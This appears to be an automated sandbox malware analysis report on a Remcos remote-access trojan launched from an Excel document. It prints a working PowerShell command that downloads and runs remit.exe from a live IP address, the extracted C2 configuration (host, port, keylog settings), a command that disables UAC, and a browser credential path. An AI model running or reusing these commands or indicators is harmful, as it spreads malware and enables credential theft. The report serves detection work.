24.2.logagent.exe.10591a73.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x5e2a4:$str_a1: C:\Windows\System32\cmd.exe 0x5e220:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e220:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5d828:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5de80:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5d47c:$str_b2: Executing file: 0x5e3e8:$str_b3: GetDirectListeningPort 0x5dc40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5de68:$str_b7: \update.vbs 0x5d4cc:$str_b9: Downloaded file: 0x5d4b8:$str_b10: Downloading file: 0x5d4a0:$str_b12: Failed to upload file: 0x5e3b0:$str_b13: StartForward 0x5e3d0:$str_b14: StopForward 0x5de10:$str_b15: fso.DeleteFile " 0x5dda4:$str_b16: On Error Resume Next 0x5de40:$str_b17: fso.DeleteFolder " 0x5d490:$str_b18: Uploaded file: 0x5d50c:$str_b19: Unable to delete: 0x5ddd8:$str_b20: while fso.FileExists(" 0x5d961:$str_c0: [Firefox StoredLogins not found]
Click to see the 19 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder

Show sources

Source: Process started

Author: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\logagent.exe, ParentImage: C:\Windows\SysWOW64\logagent.exe, ParentProcessId: 5572, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs' , ProcessId: 1648

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\filesvr.exe' , CommandLine: 'C:\Users\Public\filesvr.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\filesvr.exe, NewProcessName: C:\Users\Public\filesvr.exe, OriginalFileName: C:\Users\Public\filesvr.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2348, ProcessCommandLine: 'C:\Users\Public\filesvr.exe' , ProcessId: 6536

Sigma detected: WScript or CScript Dropper

Show sources

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\logagent.exe, ParentImage: C:\Windows\SysWOW64\logagent.exe, ParentProcessId: 5572, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs' , ProcessId: 1648

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6344, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe, ProcessId: 6584

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6344, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe, ProcessId: 6584

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132767588422650070.6584.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 24.2.logagent.exe.10591a73.1.raw.unpack

Malware Configuration Extractor: Remcos {"Version": "3.2.1 Pro", "Host:Port:Password": "twistednerd.dvrlists.com:8618:1", "Assigned name": "Sept", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Sept-AITAB5", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 24.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10591a73.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10591a73.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10591a73.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.512423123.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.509224017.0000000002748000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.456970464.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 3360, type: MEMORYSTR

Source: 24.0.logagent.exe.10590000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.2.logagent.exe.10590000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 44.0.logagent.exe.10590000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.0.logagent.exe.10590000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.0.logagent.exe.10590000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.0.logagent.exe.10590000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 44.0.logagent.exe.10590000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 44.2.logagent.exe.10590000.1.unpack	Avira: Label: TR/Dropper.Gen

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_0042E5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

24_2_0042E5CA

Source: logagent.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

24_2_0040697D

Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\
Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\
Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_0040A012
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004061C3 FindFirstFileW,FindNextFileW,	24_2_004061C3
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	24_2_0040A22D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,	24_2_004153F5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	24_2_00417754
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_004077EC
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00446AF9 FindFirstFileExA,	24_2_00446AF9
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00407C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_00407C55

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic

TCP traffic: 192.168.2.3:49742 -> 192.210.214.221:80

Source: global traffic

DNS query: name: onedrive.live.com

Source: global traffic

TCP traffic: 192.168.2.3:49742 -> 192.210.214.221:80

Source: excel.exe

Memory has grown: Private usage: 1MB later: 76MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: twistednerd.dvrlists.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 21 Sep 2021 19:34:33 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/8.0.6Last-Modified: Tue, 21 Sep 2021 14:55:18 GMTETag: "114c00-5cc82960aee97"Accept-Ranges: bytesContent-Length: 1133568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 90 06 00 00 b8 0a 00 00 00 00 00 6c ac 06 00 00 10 00 00 00 b0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 11 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 0f 00 66 2a 00 00 00 b0 10 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 10 00 f4 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 10 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 e7 0f 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 81 06 00 00 10 00 00 00 82 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 f0 0c 00 00 00 a0 06 00 00 0e 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e4 eb 08 00 00 b0 06 00 00 ec 08 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 2c 39 00 00 00 a0 0f 00 00 00 00 00 00 80 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 66 2a 00 00 00 e0 0f 00 00 2c 00 00 00 80 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 10 10 00 00 00 00 00 00 ac 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 10 00 00 02 00 00 00 ac 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 76 00 00 00 30 10 00 00 78 00 00 00 ae 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 26 01 00 00 b0 10 00 00 26 01 00 00 26 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 11 00 00 00 00 00 00 4c 11

Source: global traffic

HTTP traffic detected: GET /remit.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 192.210.214.221Connection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.3:49788 -> 31.3.152.100:8618

Source: powershell.exe, 00000004.00000002.311675981.0000000005582000.00000004.00000001.sdmp	String found in binary or memory: http://192.210.214.221
Source: PowerShell_transcript.045012.O350p8xx.20210921213404.txt.4.dr	String found in binary or memory: http://192.210.214.221/remit.exe
Source: powershell.exe, 00000004.00000003.308508041.00000000099C9000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.311221012.0000000004FD0000.00000004.00000040.sdmp, powershell.exe, 00000004.00000002.310610718.0000000003670000.00000004.00000040.sdmp	String found in binary or memory: http://192.210.214.221/remit.exe-OutFile$env:public
Source: powershell.exe, 00000004.00000002.311675981.0000000005582000.00000004.00000001.sdmp	String found in binary or memory: http://192.210.214.2214
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: powershell.exe, 00000004.00000002.318468699.0000000006382000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0B
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0E
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0F
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0K
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0M
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000004.00000002.311467202.0000000005461000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: powershell.exe, 00000004.00000002.311283223.0000000005321000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
